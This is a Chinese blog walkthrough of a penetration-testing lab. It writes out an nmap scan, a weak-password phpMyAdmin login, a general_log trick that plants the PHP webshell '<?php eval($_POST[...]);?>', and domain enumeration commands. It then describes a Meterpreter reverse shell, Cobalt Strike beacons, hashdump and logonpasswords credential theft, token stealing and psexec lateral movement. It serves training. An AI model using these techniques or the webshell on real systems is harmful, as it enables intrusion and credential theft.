反弹连接cs的使用

信息收集

扫描端口

  • 靶场地址:10.203.87.175
  • nmap -sS -sV -A 10.203.87.175

请添加图片描述

  • 开了80端口,浏览器打开

请添加图片描述

  • 发现备份文件,点击备份文件,解压

请添加图片描述

  • 打开每个文件看看

请添加图片描述

  • 有可能是网站中刚打开的YXCMS,回到网站,点击XYCMS

请添加图片描述

漏洞利用

phpMyadmin

请添加图片描述

  • 通过弱口令root/root进入

请添加图片描述

  • select @@basedir; //查询路径

请添加图片描述

  • show global variables like ‘%general%’; //查看general*值

请添加图片描述

  • general_log为OFF
  • set global general_log=on; //开启日志

请添加图片描述

  • 再次看一遍日志

请添加图片描述

  • set global general_log_file=‘C:/phpstudy/www/llljy.php’; //设置日志存放文件

请添加图片描述

  • select ‘<?php eval($_POST["nnn"]);?>’ //执行语句,会写入我们设置的llljy.php中

请添加图片描述

  • 蚁剑连接

请添加图片描述

yxcms

  • 观察网站页面的时候,发现后台网址和用户名及密码
  • 登录后台,漏洞位置在:前台模板——管理模板文件——新增
  • 在beifen.rar中找到网站模板路径,蚁剑连接

后渗透

域内信息收集

net view /domain //查询有几个域, 查询域列表
net time /domain //使计算机的时钟与另一台计算机或域的时间同步。
net config workstation //显示工作站运行的相关信息
net group /domain //获得所有域用户组列表
net user /domain //获得所有域用户列表
nslookup xxx

请添加图片描述请添加图片描述

  • 如果工作站域(Workstation domain)为workgroup则代表不存在域环境,若是报错:发生系统错误 5,则存在域,但该用户不是域用户,其中登录域(Logon domain) 表明当前登录的用户是域用户
    由图得知,此处域为GOD且当前登录用户为域用户

请添加图片描述

反弹shell

  • 利用msfvenom生成payload

请添加图片描述

  • 把payload从蚁剑上传

请添加图片描述

  • 利用msfconsole,设置监听IP和端口

请添加图片描述

  • 在蚁剑上运行payload

请添加图片描述

  • 成功获得meterpreter

请添加图片描述

提权

  • 利用getsystem提权

请添加图片描述

利用cs与msf联动设置代理

cs的准备工作

  • 把下载好的cs复制到Kali
  • unzip解压

请添加图片描述

  • ls查看cs下的文件

请添加图片描述

  • 查看是否具备Java环境

请添加图片描述

  • 开启cs服务端
  • 设置IP和密码

请添加图片描述

  • 开启客户端

请添加图片描述

请添加图片描述

  • 设置监听

请添加图片描述
请添加图片描述
请添加图片描述
请添加图片描述
请添加图片描述

  • 生成payload

请添加图片描述

  • 执行payload

请添加图片描述

  • 监听开始

请添加图片描述

  • 目标主机上线

请添加图片描述

系统信息收集

  • 选中右键,打开beacon功能

请添加图片描述

  • 查看网络配置

请添加图片描述请添加图片描述
请添加图片描述

主机密码收集

cs读内存

  • 使用hashdump

请添加图片描述

  • 使用Credentials 模块下查看

请添加图片描述

cs读注册表密码

  • 使用 logonpasswords

请添加图片描述

利用cs设置代理

请添加图片描述

请添加图片描述
请添加图片描述
请添加图片描述

msf配置代理

请添加图片描述
请添加图片描述
请添加图片描述

添加路由

请添加图片描述

  • 设置代理成功
    请添加图片描述

msf扫描内网主机

请添加图片描述

请添加图片描述

内网信息收集

  • 在beacon上右键->目标->选择net view

请添加图片描述

  • 执行后在Targets选项查看扫描的主机

请添加图片描述

获取内网主机权限

窃取Token

请添加图片描述

请添加图片描述

  • 窃取成功
    请添加图片描述
  • psexec使用凭证来登录其他主机
  • 横向已经探测到了获取内网的其他Targets以及读取到的凭证信息
  • 可以利用psexec模块,选择使用token登录其他主机

请添加图片描述- 会话生成

请添加图片描述

  • 扫描内网

请添加图片描述

  • 开放445端口

请添加图片描述

  • 从192.168.52.141登录192.168.52.138

请添加图片描述- 窃取token

请添加图片描述请添加图片描述

  • 利用用户信息及token登录

请添加图片描述- 生成会话

请添加图片描述

总结

  • 获得192.168.52.128的system权限

请添加图片描述

  • 获得192.168.52.141的system权限
  • 获得192.168.52.138的system权限

请添加图片描述

请添加图片描述

请添加图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值